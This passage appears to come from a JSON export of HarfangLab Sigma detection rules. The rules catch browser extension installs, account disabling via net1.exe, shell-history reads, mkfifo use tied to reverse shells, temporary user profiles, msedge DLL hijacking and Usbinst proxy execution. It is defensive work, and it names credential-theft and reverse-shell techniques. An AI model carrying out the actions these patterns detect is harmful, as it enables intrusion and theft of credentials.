'?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n\n exclusion_dllhost:\n ProcessImage: '?:\\Windows\\System32\\dllhost.exe'\n ProcessCommandLine: '?:\\windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_transwiz:\n ProcessName: 'Transwiz.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'ForensiT Limited'\n\n exclusion_veeam:\n ProcessName: 'VeeamGuestHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Veeam Software Group GmbH'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup7Pro.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Fabrice PARISOT'\n\n exclusion_migwiz:\n ProcessOriginalFileName: 'migwiz.exe'\n ProcessDescription: 'Windows Easy Transfer Application'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef", "rule_name": "Suspicious Chrome-based Browser Extension Installed", "rule_description": "Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\nEvery extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\nAdversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\nIt is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\n", "rule_creation_date": "2024-10-09", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1176" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0faba2f2-3820-425b-9718-42eaa1fcb204", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074150Z", "creation_date": "2026-03-23T11:45:34.074152Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074156Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1531/" ], "name": "t1564_net_disable_account.yml", "content": "title: User Account Disabled via net.exe\nid: 0faba2f2-3820-425b-9718-42eaa1fcb204\ndescription: |\n Detects a user account being disabled via net1.exe.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n It is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/03/15\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_user:\n CommandLine|contains: 'user'\n\n selection_disable:\n CommandLine|contains:\n - '/ACTIVE:NO'\n - '\\ACTIVE:NO'\n\n condition: all of selection_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0faba2f2-3820-425b-9718-42eaa1fcb204", "rule_name": "User Account Disabled via net.exe", "rule_description": "Detects a user account being disabled via net1.exe.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\nIt is recommended to analyze the process responsible for the call to net.exe to determine whether this action has legitimate intent.\n", "rule_creation_date": "2021-03-15", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.impact" ], "rule_technique_tags": [ "attack.t1531" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0fc4c3c8-8e84-4478-998f-09de36df227c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622169Z", "creation_date": "2026-03-23T11:45:34.622171Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622176Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1552/003/" ], "name": "t1552_003_shell_history_read_linux.yml", "content": "title: Shell History File Read (Linux)\nid: 0fc4c3c8-8e84-4478-998f-09de36df227c\ndescription: |\n Detects an attempt to read any of the common shell history files.\n These files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\n It can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2022/11/15\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_file:\n - Path|endswith:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n - TargetPath:\n - '.history'\n - '.ash_history'\n - '.bash_history'\n - '.tcsh_history'\n - '.sh_history'\n - '.zsh_history'\n - 'fish_history'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n ProcessParentImage|contains: '?'\n\n exclusion_shell:\n ProcessImage|endswith:\n - '/ash'\n - '/bash'\n - '/busybox'\n - '/dash'\n - '/fish'\n - '/sh'\n - '/tcsh'\n - '/zsh'\n\n exclusion_desktop_apps_and_daemons:\n ProcessImage|endswith:\n - '/nautilus'\n - '/eog'\n - '/gedit'\n - '/dolphin'\n - '/librewolf'\n - '/firefox'\n - '/chrome'\n - '/code'\n - '/codium'\n - '/sublime_text'\n - '/thunar'\n - '/slack'\n - '/file-roller'\n - '/thunderbird' # /usr/lib/thunderbird/thunderbird\n - '/thunderbird-bin' # /usr/lib/thunderbird/thunderbird-bin\n - '/@joplinapp-desktop'\n - '/gjs-console'\n - '/nemo'\n - '/bacula-fd'\n - '/xdg-desktop-portal-*'\n - '/tracker-miner-fs-3'\n\n exclusion_plasma:\n ProcessParentImage|endswith: '/usr/bin/plasmashell'\n\n exclusion_process:\n - ProcessImage:\n - '/opt/eset/*'\n - '/usr/bin/clamscan'\n - '/usr/bin/com.github.phase1geo.minder'\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/lib/libreoffice/program/soffice.bin'\n - '/opt/ds_agent/ds_am'\n - '/usr/lib/virtualbox/VirtualBox'\n - '*/VirtualBoxVM'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/flameshot'\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/usr/sbin/smbd'\n - '/usr/bin/rsync'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/signal/signal-desktop'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/snap/obsidian/*/obsidian'\n - '/opt/elastic/agent/data/elastic-agent-*/components/osqueryd'\n - '/usr/share/teams/teams'\n - '/opt/teams-for-linux/teams-for-linux'\n - '/snap/teams-for-linux/*/teams-for-linux'\n - '/usr/sbin/libvirtd'\n - '/opt/zotero_linux/zotero-bin'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/usr/lib/firefox-esr/firefox-esr'\n - '/usr/lib/firefox/firefox-bin'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/rocket.chat/rocketchat-desktop'\n - '/usr/bin/inkscape'\n - '/usr/bin/xfce4-panel'\n - '/usr/bin/caja'\n - '/usr/lib/zotero/zotero-bin'\n - '/usr/bin/hstr'\n - '/usr/bin/aide'\n - '/usr/lib/mongodb-compass/mongodb compass'\n - '/usr/bin/cpio'\n - '/opt/omni/lbin/vbda'\n - '/usr/bin/geany'\n - '/usr/bin/okular'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/usr/bin/xfdesktop'\n - '/opt/elastic/agent/data/elastic-agent-*/components/agentbeat'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/nix/store/*-zen-browser-*/lib/zen-*/zen'\n - ProcessCommandLine:\n - '/opt/cybereason/sensor/bin/cbram'\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/bin/python3 /usr/bin/nagstamon'\n\n exclusion_pycharm:\n ProcessImage: '/opt/pycharm-professional/jbr/bin/java'\n ProcessCommandLine|contains: 'com.intellij.idea.main'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0fc4c3c8-8e84-4478-998f-09de36df227c", "rule_name": "Shell History File Read (Linux)", "rule_description": "Detects an attempt to read any of the common shell history files.\nThese files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to analyze the process responsible for reading the files and to determine whether this access is legitimate.\nIt can be interesting to download the shell history file to determine if attackers had access to sensitive materials.\n", "rule_creation_date": "2022-11-15", "rule_modified_date": "2026-01-21", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1552.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623164Z", "creation_date": "2026-03-23T11:45:34.623166Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623170Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://linux.die.net/man/1/mkfifo", "https://threatpost.com/mitel-voip-bug-exploited/180079/", "https://attack.mitre.org/techniques/T1559/" ], "name": "t1559_fifo_file_created.yml", "content": "title: FIFO File Created\nid: 0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\n Adversaries can create FIFO files in combination with openssl_client to create a reverse shell.\n It is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n exclusion_bitdefender_install:\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_rt_sctemp:\n # mkfifo rt_sctemp/ficsecuqlik_dataware.fifo\n # mkfifo rt_sctemp/ventiv_salaries.fifo\n CommandLine: 'mkfifo rt_sctemp/*.fifo'\n\n exclusion_flowcell_dna:\n CommandLine: 'mkfifo /dev/shm/nxf.*/.command.*'\n\n exclusion_qubes:\n ParentCommandLine|contains: '/usr/lib/qubes/qubes-rpc-multiplexer'\n\n exclusion_gitstatus:\n - CommandLine|contains: ' -- /tmp/gitstatus.'\n - ParentCommandLine|contains: ' -- /tmp/gitstatus.'\n\n exclusion_powerlevel10k:\n - CommandLine|contains: ' -- /tmp/p10k.worker.'\n - ParentCommandLine|contains: ' -- /tmp/p10k.worker.'\n\n exclusion_dracut:\n - CommandLine|startswith:\n - 'mkfifo /var/tmp/dracut.'\n - 'mkfifo /tmp/dracut.'\n - ParentCommandLine|startswith:\n - '/usr/bin/bash -p /bin/dracut'\n - '/usr/bin/bash -p /usr/bin/dracut'\n\n exclusion_hot_db_backup:\n ParentCommandLine|startswith: '/bin/sh /*/oracle/scripts/hot_db_backup.sh '\n\n exclusion_sqwmys_dumpdatabase:\n ParentCommandLine|startswith: '/bin/ksh /*/sqwareproduction/mysql/bin/sqwmys_dumpdatabase.ksh '\n\n exclusion_eset:\n Ancestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_scality:\n CommandLine: 'mkfifo /tmp/tmp.*/stdout /tmp/tmp.*/stderr'\n ParentCommandLine: '/bin/bash /usr/bin/scality-backup'\n\n exclusion_agent:\n CommandLine|startswith: 'mkfifo /tmp/agent_linux_x86_64.sh.pipe.'\n\n exclusion_qradar:\n GrandparentCommandLine: '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n\n exclusion_code:\n - ParentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n - GrandparentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n\n exclusion_codium:\n ParentImage: '/usr/share/codium/codium'\n\n exclusion_kamailio:\n CommandLine|startswith: 'mkfifo /tmp/kamailio_'\n ParentCommandLine|startswith: '/bin/sh /sbin/kamctl '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/crond|'\n\n exclusion_tmux:\n CommandLine:\n - 'mkfifo /tmp/tmux_fzf_session_name'\n - 'mkfifo /tmp/fzf-fifo?-*'\n - 'mkfifo -m o+w /tmp/fzf-fifo?-*'\n Ancestors|contains: '/usr/bin/tmux|'\n\n exclusion_windsurf:\n GrandparentImage: '/usr/share/windsurf/windsurf'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47", "rule_name": "FIFO File Created", "rule_description": "Detects the execution of mkfifo or mknod.\nBoth utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\nAdversaries can create FIFO files in combination with openssl_client to create a reverse shell.\nIt is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\n", "rule_creation_date": "2023-12-15", "rule_modified_date": "2026-01-23", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079326Z", "creation_date": "2026-03-23T11:45:34.079328Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079332Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6", "https://attack.mitre.org/techniques/T1136/001/", "https://attack.mitre.org/techniques/T1070/004/" ], "name": "t1070_004_temporary_user_profile_creation.yml", "content": "title: Temporary User Profile Created\nid: 0fd65b55-ba18-4a16-86bb-19fdfaeb3e37\ndescription: |\n Detects the creation of a temporary user profile.\n A temporary profile is created each time an error condition prevents the user profile from loading.\n Temporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\n A temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\n An attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\n It is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\nreferences:\n - https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6\n - https://attack.mitre.org/techniques/T1136/001/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/03/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\TEMP\\NTUSER.DAT'\n\n exclusion_microsoftsearchinbing:\n Image: '?:\\Program Files (x86)\\Microsoft\\Microsoft Search in Bing\\MicrosoftSearchInBing.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_symantec:\n ProcessImage|startswith: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37", "rule_name": "Temporary User Profile Created", "rule_description": "Detects the creation of a temporary user profile.\nA temporary profile is created each time an error condition prevents the user profile from loading.\nTemporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\nA temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\nAn attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\nIt is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\n", "rule_creation_date": "2023-03-08", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1070.004", "attack.t1136.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "10614140-6f5c-442a-b818-e7f6202dc54a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598780Z", "creation_date": "2026-03-23T11:45:34.598784Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598791Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_msedge.yml", "content": "title: DLL Hijacking via msedge.exe\nid: 10614140-6f5c-442a-b818-e7f6202dc54a\ndescription: |\n Detects potential Windows DLL Hijacking via msedge.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\fastprox.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SysWOW64\\\\wbem\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\System32\\\\wbem\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\WinSxS\\\\wbem\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "10614140-6f5c-442a-b818-e7f6202dc54a", "rule_name": "DLL Hijacking via msedge.exe", "rule_description": "Detects potential Windows DLL Hijacking via msedge.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "106504ea-01dd-41ce-a381-3e8f27c77ff0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077409Z", "creation_date": "2026-03-23T11:45:34.077411Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077415Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md", "https://attack.mitre.org/techniques/T1218/" ], "name": "t1218_usbinst.yml", "content": "title: Proxy Execution via Usbinst\nid: 106504ea-01dd-41ce-a381-3e8f27c77ff0\ndescription: |\n Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\n This binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\nreferences:\n - https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - 